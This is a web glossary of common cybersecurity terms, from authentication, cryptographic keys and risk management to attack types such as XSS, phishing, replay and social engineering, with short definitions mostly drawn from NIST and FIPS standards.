Cyber Dictionary – A Glossary of Common Cyber Security Terminology
Cyber Dictionary provides you with the most common cyber security terminology (as defined in the well-known standards) for knowledge and wisdom in cyber security. For more detailed explanations on the terms, you can click on the highlighted terms.
Alert: A notification triggered by an event. Alerts serve the purpose of warning of suspicious events that require further attention. (2)
Accreditation: The official management decision to authorize operation of an information system and to explicitly accept the risk to agency operations (including mission, functions, image, or reputation), agency assets, or individuals, based on the implementation of an agreed-upon set of security controls. (6)
Adaptive Authentication: A way of implementing 2 Factor Authentication (2FA) or Multi-Factor Authentication (MFA), using a risk based approach and making the authentication decisions adaptively according to the risk level calculated.
Adequate Security: Security commensurate with the risk and magnitude of harm resulting from the loss, misuse, or unauthorized access to or modification of information. (7)
Advanced Persistent Threat (APT): An adversary that possesses sophisticated levels of expertise and significant resources which allow it to create opportunities to achieve its objectives by using multiple attack vectors (e.g., cyber, physical, and deception). These objectives typically include establishing and extending footholds within the information technology infrastructure of the targeted organizations for purposes of exfiltrating information, undermining or impeding critical aspects of a mission, program, or organization; or positioning itself to carry out these objectives in the future. The advanced persistent threat: (i) pursues its objectives repeatedly over an extended period of time; (ii) adapts to defenders’ efforts to resist it; and (iii) is determined to maintain the level of interaction needed to execute its objectives. (5)
Authentication: A mechanism to prove who the subject claims to be, by checking the provided credentials. See also 2 Factor Authentication (2FA), Multi-Factor Authentication (MFA), Adaptive Authentication, and Continuous Authentication. Other definitions:
- FIPS 200: Verifying the identity of a user, process, or device, often as a prerequisite to allowing access to resources in an information system. (6)
Authentication Protocol: A defined sequence of messages between a claimant and a verifier that demonstrates that the claimant has possession and control of one or more valid authenticators to establish their identity, and, optionally, demonstrates that the claimant is communicating with the intended verifier. (10)
Authenticator: Something the claimant possesses and controls (typically a cryptographic module or password) that is used to authenticate the claimant’s identity. (10)
Authenticity: The property that data originated from its purported source. (10)
Availability: Ensuring timely and reliable access to and use of information. (8)
Baiting: A social engineering technique that lures unsuspecting individuals with attractive offers to give away highly confidential or personal information to the attackers. In baiting attacks, it is critical to provide victims with something they might believe to be useful.
Baselining: Monitoring resources to determine typical utilization patterns so that significant deviations can be detected. (2)
Biometrics: Automated recognition of individuals based on their biological and behavioral characteristics. (10)
Certification: A comprehensive assessment of the management, operational, and technical security controls in an information system, made in support of security accreditation, to determine the extent to which the controls are implemented correctly, operating as intended, and producing the desired outcome with respect to meeting the security requirements for the system. (6)
Challenge-Response Protocol: An authentication protocol where the verifier sends the claimant a challenge (usually a random value or nonce) that the claimant combines with a secret (such as by hashing the challenge and a shared secret together, or by applying a private key operation to the challenge) to generate a response that is sent to the verifier. The verifier can independently verify the response generated by the claimant (such as by recomputing the hash of the challenge and the shared secret and comparing to the response, or performing a public key operation on the response) and establish that the claimant possesses and controls the secret. (10)
Claimant: A subject whose identity is to be verified using one or more authentication protocols. (10)
Common Vulnerabilities and Exposures (CVE): A dictionary of common identifiers for publicly known cyber security vulnerabilities and exposures. A CVE record in the CVE dictionary consists of 3 sections: a CVE Id, CVE description and references.
Confidentiality: Preserving authorized restrictions on information access and disclosure, including means for protecting personal privacy and proprietary information. (8)
Continuous Authentication: confirming the identity of a subject or user on an ongoing basis rather than making a single authentication check at login. In other terms, the authentication mechanism continues to verify the identity of a user during the user session.
Cross-Site Request Forgery (CSRF): An attack in which a user currently authenticated and connected to a website through a secure session, browses unwittingly to an attacker’s website while the previous connection is still open in another browser window, resulting in the attacker conduct spoofed actions on the user authenticated website.
Cross-Site Scripting (XSS): A vulnerability that allows attackers to inject malicious code into an otherwise benign website. These scripts acquire the permissions of scripts generated by the target website and can therefore compromise the confidentiality and integrity of data transfers between the website and client. Websites are vulnerable if they display user-supplied data from requests or forms without sanitizing the data so that it is not executable. (10)
Cryptographic Key: A value used to control cryptographic operations, such as decryption, encryption, signature generation, or signature verification. (10)
Cyber Security: Protection of the confidentiality, integrity and availability of information, whether it’s in transit, in processing or at store, and the underlying information systems (both hardware and software), in a cyber space where people, processes and technology are involved, through the application of policy, training & awareness and technology. See also Information Security.
Digital Signature: An asymmetric key operation where the private key is used to digitally sign data and the public key is used to verify the signature. Digital signatures provide authenticity protection, integrity protection, and non-repudiation, but not confidentiality protection. (10)
Drive-by-Download Attack: An attack type that takes advantage of security flaws on an application, web browser or operating system to install malware on users’ machines without the user’s knowledge or interaction, upon visiting a malicious website.
Eavesdropping Attack: (In the context of authentication) An attack in which an attacker listens passively to the authentication protocol to capture information that can be used in a subsequent active attack to masquerade as the claimant. (10)
Entropy: A measure of the amount of uncertainty an attacker faces to determine the value of a secret. Entropy is usually stated in bits. A value having n bits of entropy has the same degree of uncertainty as a uniformly distributed n-bit random value. (10)
Event: Any observable occurrence that result in a change of state in a network or system. (2)
Federal Information Processing Standard (FIPS): Under the Information Technology Management Reform Act, the National Institute of Standards and Technology (NIST) develops standards and guidelines that are issued as Federal Information Processing Standards (FIPS) and approved by Secretary of Commerce. FIPS documents are available online at: http://www.nist.gov/itl/fips.cfm
Hash Function: A function that maps a bit string of arbitrary length to a fixed-length bit string. Approved hash functions satisfy the following properties: (10)
- One-Way: It is computationally infeasible to find any input that maps to any pre-specified output.
- Collision Resistant: It is computationally infeasible to find any two distinct inputs that map to the same output.
Identification: Claim of a subject of its identity.
Identity: An attribute or set of attributes that uniquely describe a subject within a given context. (10)
Incident: An event that is in violation of computer security policies, acceptable use policies or security standards and that have unwanted consequences. (2) Other definitions:
- FIPS 200: An occurrence that actually or potentially jeopardizes the confidentiality, integrity, or availability of an information system or the information system processes, stores, or transmits or that constitutes a violation or imminent threat of violation of security policies, security procedures, or acceptable use policies. (6)
Incident Handling: See Incident Response.
Incident Response: A structured methodology for detecting and analyzing incidents and taking security actions and/or applying appropriate controls to mitigate the unwanted effects resulting from the incident. (2)
Information Security: The protection of information and information systems from unauthorized access, use, disclosure, disruption, modification, or destruction in order to provide confidentiality, integrity, and availability. (8)
Integrity: Guarding against improper information modification or destruction, and includes ensuring information non-repudiation and authenticity. (8)
Malware: A variety of malicious software designed to harm or exploit any programmable device or network. Types of malware can include viruses, worms, Trojan horses, root kits, ransomware, bots, adware, spyware etc.
Management Controls: The security controls (i.e., safeguards or countermeasures) for an information system that focus on the management of risk and the management of information system security. (6)
Man-in-the-Middle Attack (MitM): An attack in which an attacker is positioned between two communicating parties in order to intercept and/or alter data traveling between them. In the context of authentication, the attacker would be between claimant and verifier. (10)
Memorized Secret: A type of authenticator comprised of a character string intended to be memorized or memorable by the subscriber, permitting the subscriber to demonstrate something they know as part of an authentication process. (10)
Message Authentication Code (MAC): A cryptographic checksum on data that uses a symmetric key to detect both accidental and intentional modifications of the data. MACs provide authenticity and integrity protection, but not non-repudiation protection. (10)
Multi-Factor Authentication (MFA): Proving who the claimed identity is by using 2 or more authentication factors/methods in an authentication mechanism. In other terms, if an authentication system requires at least two different credentials that are in different authentication categories, this is called multi-factor authentication. Other definitions:
- NIST SP 800-63-3: An authentication system that requires more than one distinct authentication factor for successful authentication. MFA can be performed using a single authenticator or by a combination of authenticators that provide different factors. The three authentication factors are something you know, something you have, and something you are. (10)
Nonce: A value used in security protocols that is never repeated with the same key. For example, nonces used as challenges in challenge-response authentication protocols SHALL not be repeated until authentication keys are changed. Otherwise, there is a possibility of a replay attack. Using a nonce as a challenge is a different requirement than a random challenge, because a nonce is not necessarily unpredictable. (10)
Offline Attack: An attack where the attacker obtains some data (typically by eavesdropping on an authentication protocol run or by penetrating a system and stealing security files) that he/she is able to analyze in a system of his/her own choosing. (10)
Online Attack: An attack against an authentication protocol where the attacker either assumes the role of a claimant with a genuine verifier or actively alters the authentication channel. (10)
Online Guessing Attack: An attack in which an attacker performs repeated logon trials by guessing possible values of the authenticator output. (10)
Operational Controls: The security controls (i.e., safeguards or countermeasures) for an information system that primarily are implemented and executed by people (as opposed to systems.) (6)
Passive Attack: An attack against an authentication protocol, where the attacker intercepts data traveling along the network between the claimant and verifier, but does not alter the data (i.e., eavesdropping). (10)
Passphrase: A passphrase is a memorized secret consisting of a sequence of words or other text that a claimant uses to authenticate their identity. A passphrase is similar to a password in usage, but is generally longer for added security. (10)
Password: See Memorized Secret.
Personal Identification Number (PIN): A memorized secret typically consisting of only decimal digits. (10)
Personally Identifiable Information (PII): Information that can be used to distinguish or trace an individual’s identity, either alone or when combined with other information that is linked or linkable to a specific individual. (7)
Phishing: An attack in which the subscriber is lured (usually through an email) to interact with a counterfeit verifier and tricked into revealing information that can be used to masquerade as that subscriber to the real verifier. (10)
Presentation Attack: Presentation to the biometric data capture system with the goal of interfering with the operation of the biometric system. (10)
Pretexting: A social engineering technique that involves creating a fake identity and a story, i.e., pretext, to manipulate the victims into providing sensitive information or to make security mistakes.
Private Key: The secret part of an asymmetric key pair that is used to digitally sign or decrypt data. (10)
Pseudonym: A name other than a legal name. (10)
Public Key: The public part of an asymmetric key pair that is used to verify signatures or encrypt data. (10)
Public Key Certificate: A digital document issued and digitally signed by the private key of a certificate authority that binds an identifier to a subscriber to a public key. The certificate indicates that the subscriber identified in the certificate has sole control and access to the private key. (10)
Public Key Infrastructure (PKI): A set of policies, processes, server platforms, software, and workstations used for the purpose of administering certificates and public-private key pairs, including the ability to issue, maintain, and revoke public key certificates. (10)
Replay Attack: An attack in which the attacker is able to replay previously captured messages (between a legitimate claimant and a verifier) to masquerade as that claimant to the verifier or vice versa. (10)
Risk: The level of impact on organizational operations (including mission, functions, image, or reputation), organizational assets, or individuals resulting from the operation of an information system given the potential impact of a threat and the likelihood of that threat occurring. (6)
Risk Management: The process of managing risks to organizational operations (including mission, functions, image, or reputation), organizational assets, or individuals resulting from the operation of an information system, and includes: (i) the conduct of a risk assessment; (ii) the implementation of a risk mitigation strategy; and (iii) employment of techniques and procedures for the continuous monitoring of the security state of the informations system. (6)
Safeguards: Protective measures prescribed to meet the security requirements (i.e., confidentiality, integrity, and availability) specified for an information system. Safeguards may include security features, management constraints, personnel security, and security of physical structures, areas, and devices. (6)
Salt: A non-secret value used in a cryptographic process, usually to ensure that the results of computations for one instance cannot be reused by an attacker. (10)
Sanitization: Process to remove information from media such that information recovery is not possible. It includes removing all labels, markings, and activity logs. (6)
Security Controls: The management, operational, and technical controls (i.e., safeguards or countermeasures) prescribed for an information system to protect the confidentiality, integrity, and availability of the system and its information. (9)
Security Control Baseline: The set of minimum security controls defined for a low-impact, moderate-impact, or high-impact information system. (6)
Session Hijack Attack: An attack in which the attacker is able to insert himself or herself between a claimant and a verifier subsequent to a successful authentication exchange between the latter two parties. The attacker is able to pose as a subscriber to the verifier or vice versa to control session data exchange. (10)
Shoulder Surfing: A social engineering that involves looking over the shoulder of an individual to read sensitive information from the computer’s screen or watch the keyboard as a user types to capture the user’s access credentials.
Side-Channel Attack: An attack enabled by leakage of information from a physical crypto system. Characteristics that could be exploited in a side-channel attack include timing, power consumption, and electromagnetic and acoustic emissions. (10)
Server Message Block (SMB): An application layer protocol that allows for file, printer, device sharing and inter-process communication (IPC) between applications on a network through a client-server architecture. To put it differently, computers (SMB clients) on a network can connect to SMB servers to access shared files and directories or perform tasks like printing over the network.
Spear Phishing: A form of phishing attack that targets specific individuals rather than targeting general public with phishing spams.
Subject: A person, organization, device, hardware, network, software, or service. (10)
Symmetric Key: A cryptographic key used to perform both the cryptographic operation and its inverse. For example, to encrypt and decrypt or create a message authentication code and to verify the code. (10)
Tailgaiting: A social engineering technique that allows attackers to gain access to facilities that requires access permissions by either following individuals with access authorizations or tricking authorized personnel into helping the attackers to get into the facilities.
Technical Controls: The security controls (i.e., safeguards or countermeasures) for an information system that primarily are implemented and executed by the information system through mechanisms contained in the hardware, software, or firmware components of the system. (6)
Threat: Any circumstance or event with the potential to adversely impact organizational operations (including mission, functions, image, or reputation), organizational assets, individuals, other organizations, or the Nation through an information system via unauthorized access, destruction, disclosure, modification of information, and/or denial of service. (5) See also Advanced Persistent Threat (APT).
Threat Source: The intent and method targeted at the intentional exploitation of a vulnerability or a situation and method that may accidentally trigger a vulnerability. (6)
Transport Layer Security (TLS): An authentication and security protocol widely implemented in browsers and web servers. TLS is defined by RFC 5246. (10)
Usability: Extent to which a product can be used by specified users to achieve specified goals with effectiveness, efficiency, and satisfaction in a specified context of use. (11)
Verifier: An entity that verifies the claimant’s identity by verifying the claimant’s possession and control of one or two authenticators using an authentication protocols. (10)
Vishing: A term that combines “voice” and “phishing” to describe a social engineering technique that involves using phone calls or voice messages to steal or capture sensitive information from the victims. In vishing attacks, attackers usually impersonate other individuals such as superiors, help desk personnel etc. or spoof institutions such as banks or financial institutions.
Vulnerability: A flaw or weakness in a system that could be exploited by a threat vector and lets the adversary bypass the implemented protection mechanisms with respect to confidentiality, integrity and availability. Vulnerabilities can allow attackers to gain unauthorized access to resources, steal, modify or destroy data, install malware etc. Other definitions:
- National Institute of Standards and Technology (NIST): A flaw or weakness in system security procedures, design, implementation, or internal controls that could be exercised (accidentally triggered or intentionally exploited) and result in a security breach or a violation of the system’s security policy. (3)
- ISO 27005: A weakness on an asset or group of assets that can be exploited by one or more threats, where an asset is anything that has value to the organization, its business operations and their continuity, including information resources that support the organization’s mission.
- IETF RFC 4949: A flaw or weakness in a system’s design, implementation, or operation and management that could be exploited to violate the system’s security policy.
- European Union Agency for Cybersecurity (ENISA): The existence of a weakness, design, or implementation error that can lead to an unexpected, undesirable event compromising the security of the computer system, network, application, or protocol involved.
Watering Hole: A social engineering technique in which a legitimate and commonly visited website is infected by attackers in order to install malware on the visitors’ machines automatically or trick the targeted users into downloading and launching the malicious code from the compromised website.
Whaling: A form of spear phishing attack that specifically target high-profile individuals such as senior employees, high level executives or individuals with privileged access to systems, such as system/network administrators.
Zeroize: Overwrite a memory location with data consisting entirely of bits with the value zero so that the data is destroyed and not recoverable. This is often contrasted with deletion methods that merely destroy reference to data within a file system rather than the data itself. (10)
Zero-Knowledge Password Protocol: A password-based authentication protocol that allows a claimant to authenticate to a verifier without revealing the password to the verifier. Examples of such protocols are EKE, SPEKE and SRP. (10)
2 Factor Authentication (2FA): A method of confirming a subject’s identity through a combination of only 2 authentication factors, such as something you know and something you have or something you have and something you do. 2FA is a subset of Multi-Factor Authentication (MFA).
If you think you know-it-all about cybersecurity, this discipline was probably ill-explained to you.Stephane Nappo
Read more educational and inspirational cyber quotes at our page 100+ Best Cyber Security & Hacker Quotes.
- NIST Computer Security Resource Center Glossary
- NIST SP 800-61 Rev. 2 Computer Security Incident Handling Guide
- NIST SP 800-53 Rev. 5 Security and Privacy Controls for Information Systems and Organizations
- NIST SP 800-30 Rev. 1 Guide for Conducting Risk Assessment
- NIST SP 800-39 Managing Information Security Risk
- FIPS PUB 200 Federal Information Processing Standards Publication: Minimum Security Requirements for Federal Information and Information Systems
- OMB Circular A-130, Appendix III Security of Federal Information Resources
- 44 U.S.C., SEC. 3542 Definitions
- FIPS PUB 199 Standards for Security Categorization of Federal Information and Information Systems
- NIST SP 800-63-3 Digital Identity Guidelines
- ISO/IEC 9241-11 Ergonomic Requirements for Office Work with Visual Display Terminals (VDTs) – Part 11: Guidance on Usability